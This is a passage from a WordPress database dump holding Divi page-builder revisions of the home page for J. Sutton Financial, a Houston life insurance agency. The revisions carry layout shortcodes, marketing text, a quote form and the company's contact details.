button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-15px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" always_center_on_mobile=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" width_tablet=\"70%\" width_phone=\"50%\" width_last_edited=\"on|desktop\" module_alignment=\"left\" custom_margin=\"|||0px||\" custom_margin_tablet=\"|||0px||\" custom_margin_phone=\"|||0px||\" custom_margin_last_edited=\"on|desktop\" custom_padding=\"|||0px||\" animation_direction=\"left\" module_alignment_tablet=\"center\" module_alignment_phone=\"center\" module_alignment_last_edited=\"on|phone\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" parallax=\"on\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" width_tablet=\"75%\" width_phone=\"75%\" width_last_edited=\"on|phone\" module_alignment=\"center\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"24.8px\" custom_margin=\"||66px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-08 22:00:39','2023-04-08 22:00:39','',138,'http://cmdev-site1.com/?p=894',0,'revision','',0),(889,1,'2023-04-08 21:55:57','2023-04-08 21:55:57','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" parallax=\"on\" min_height=\"100px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||0px|||\" hover_transition_speed_curve=\"ease-out\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_menu active_link_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|phone\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"126.5px\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"||0px|0px|false|false\" hover_enabled=\"0\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"off|desktop\" menu_text_color__hover=\"#003372\" theme_builder_area=\"et_header_layout\" logo_width_last_edited=\"on|tablet\" sticky_enabled=\"0\" logo_width_phone=\"75%\" logo_width_tablet=\"75%\" menu_font_last_edited=\"on|desktop\" menu_text_color_last_edited=\"on|phone\" menu_text_color_tablet=\"#000000\" menu_text_color_phone=\"#000000\" background_layout_last_edited=\"on|tablet\" background_layout_phone=\"light\" background_layout_tablet=\"light\" mobile_menu_text_color=\"#000000\" mobile_menu_bg_color=\"#FFFFFF\" menu_font_tablet=\"||||||||\" menu_font_phone=\"||||||||\"][/et_pb_menu][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','inherit','closed','closed','','528-revision-v1','','','2023-04-08 21:55:57','2023-04-08 21:55:57','',528,'http://cmdev-site1.com/?p=889',0,'revision','',0),(906,3,'2023-04-11 21:37:24','2023-04-11 21:37:24','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" parallax=\"on\" min_height=\"700px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||30px|||\" hover_transition_speed_curve=\"ease-out\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu submenu_direction=\"downwards\" active_link_color=\"#FFFFFF\" dropdown_menu_bg_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_text_color=\"#000000\" mobile_menu_bg_color=\"#FFFFFF\" mobile_menu_text_color=\"#000000\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" menu_icon_color=\"#FFFFFF\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|phone\" mobile_menu_bg_color_tablet=\"#FFFFFF\" mobile_menu_bg_color_phone=\"#FFFFFF\" mobile_menu_bg_color_last_edited=\"on|phone\" logo_width_tablet=\"20%\" logo_width_phone=\"75%\" logo_width_last_edited=\"on|phone\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"221.9px\" custom_margin=\"-43px|||0px|false|false\" custom_margin_tablet=\"-43px|||0px|false|false\" custom_margin_phone=\"-10px||||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\" dropdown_menu_bg_color__hover_enabled=\"on|desktop\" mobile_menu_text_color__hover_enabled=\"on|desktop\" dropdown_menu_bg_color__hover=\"#FFFFFF\" mobile_menu_text_color__hover=\"#000000\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" min_height=\"100px\" custom_margin=\"||-12px|||\" custom_padding=\"||0px||false|false\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin_tablet=\"\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|desktop\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_button button_url=\"/products-services/\" button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_border_width=\"0px\" button_border_radius=\"14px\" custom_margin=\"|||150px|false|false\" custom_margin_tablet=\"|||150px|false|false\" custom_margin_phone=\"|||0px|false|false\" custom_margin_last_edited=\"on|phone\" global_colors_info=\"{}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_button button_url=\"/careers/\" button_text=\"Work With Us\" button_alignment=\"center\" _builder_version=\"4.20.4\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_border_width=\"0px\" button_border_radius=\"14px\" custom_margin=\"|150px|||false|false\" custom_margin_tablet=\"|150px|||false|false\" custom_margin_phone=\"|0px|||false|false\" custom_margin_last_edited=\"on|desktop\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\" align=\"center\" always_center_on_mobile=\"off\" _builder_version=\"4.20.4\" _module_preset=\"default\" width=\"70%\" width_tablet=\"70%\" width_phone=\"50%\" width_last_edited=\"on|desktop\" module_alignment=\"right\" custom_margin=\"||||false|false\" custom_margin_tablet=\"|37px||89px|false|false\" custom_margin_phone=\"|0px||0px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"33px|1px||||\" custom_padding_tablet=\"33px|1px||||\" custom_padding_phone=\"0px|0px|||false|false\" custom_padding_last_edited=\"on|phone\" animation_style=\"roll\" animation_direction=\"left\" animation_duration=\"1250ms\" hover_enabled=\"0\" module_alignment_tablet=\"center\" module_alignment_phone=\"center\" module_alignment_last_edited=\"on|desktop\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-15px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" header_2_text_align=\"center\" header_2_text_color=\"#000000\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" always_center_on_mobile=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" width_tablet=\"70%\" width_phone=\"50%\" width_last_edited=\"on|desktop\" module_alignment=\"left\" custom_margin=\"|||0px||\" custom_margin_tablet=\"|||0px||\" custom_margin_phone=\"|||0px||\" custom_margin_last_edited=\"on|desktop\" custom_padding=\"|||0px||\" animation_direction=\"left\" module_alignment_tablet=\"center\" module_alignment_phone=\"center\" module_alignment_last_edited=\"on|phone\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" parallax=\"on\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" width_tablet=\"75%\" width_phone=\"75%\" width_last_edited=\"on|phone\" module_alignment=\"center\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"24.8px\" custom_margin=\"||66px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-11 21:37:24','2023-04-11 21:37:24','',138,'http://cmdev-site1.com/?p=906',0,'revision','',0),(895,1,'2023-04-08 22:02:22','2023-04-08 22:02:22','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" parallax=\"on\" min_height=\"700px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||30px|||\" hover_transition_speed_curve=\"ease-out\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu submenu_direction=\"downwards\" active_link_color=\"#FFFFFF\" dropdown_menu_bg_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_text_color=\"#000000\" mobile_menu_bg_color=\"#FFFFFF\" mobile_menu_text_color=\"#000000\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" menu_icon_color=\"#FFFFFF\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|phone\" mobile_menu_bg_color_tablet=\"#FFFFFF\" mobile_menu_bg_color_phone=\"#FFFFFF\" mobile_menu_bg_color_last_edited=\"on|phone\" logo_width_tablet=\"20%\" logo_width_phone=\"75%\" logo_width_last_edited=\"on|phone\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"221.9px\" custom_margin=\"-43px|||0px|false|false\" custom_margin_tablet=\"-43px|||0px|false|false\" custom_margin_phone=\"-10px||||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\" dropdown_menu_bg_color__hover_enabled=\"on|desktop\" mobile_menu_text_color__hover_enabled=\"on|desktop\" dropdown_menu_bg_color__hover=\"#FFFFFF\" mobile_menu_text_color__hover=\"#000000\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" min_height=\"100px\" custom_margin=\"||-12px|||\" custom_padding=\"||0px||false|false\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin_tablet=\"\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|desktop\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_button button_url=\"/products-services/\" button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_border_width=\"0px\" button_border_radius=\"14px\" custom_margin=\"|||150px|false|false\" custom_margin_tablet=\"|||150px|false|false\" custom_margin_phone=\"|||0px|false|false\" custom_margin_last_edited=\"on|phone\" global_colors_info=\"{}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_button button_url=\"/careers/\" button_text=\"Work for Us\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_border_width=\"0px\" button_border_radius=\"14px\" custom_margin=\"|150px|||false|false\" custom_margin_tablet=\"|150px|||false|false\" custom_margin_phone=\"|0px|||false|false\" custom_margin_last_edited=\"on|desktop\" global_colors_info=\"{}\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\" title_text=\"Thumbs Up Icon No Background Hex 666666\" align=\"center\" always_center_on_mobile=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" width_tablet=\"70%\" width_phone=\"50%\" width_last_edited=\"on|desktop\" module_alignment=\"right\" custom_margin=\"||||false|false\" custom_margin_tablet=\"|37px||89px|false|false\" custom_margin_phone=\"|0px||0px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"33px|1px||||\" custom_padding_tablet=\"33px|1px||||\" custom_padding_phone=\"0px|0px|||false|false\" custom_padding_last_edited=\"on|phone\" animation_style=\"roll\" animation_direction=\"left\" animation_duration=\"1250ms\" module_alignment_tablet=\"center\" module_alignment_phone=\"center\" module_alignment_last_edited=\"on|desktop\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" hover_enabled=\"0\" global_colors_info=\"{}\" header_2_text_align=\"center\" sticky_enabled=\"0\"]<h2><strong>Providing Premium Life Insurance Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" 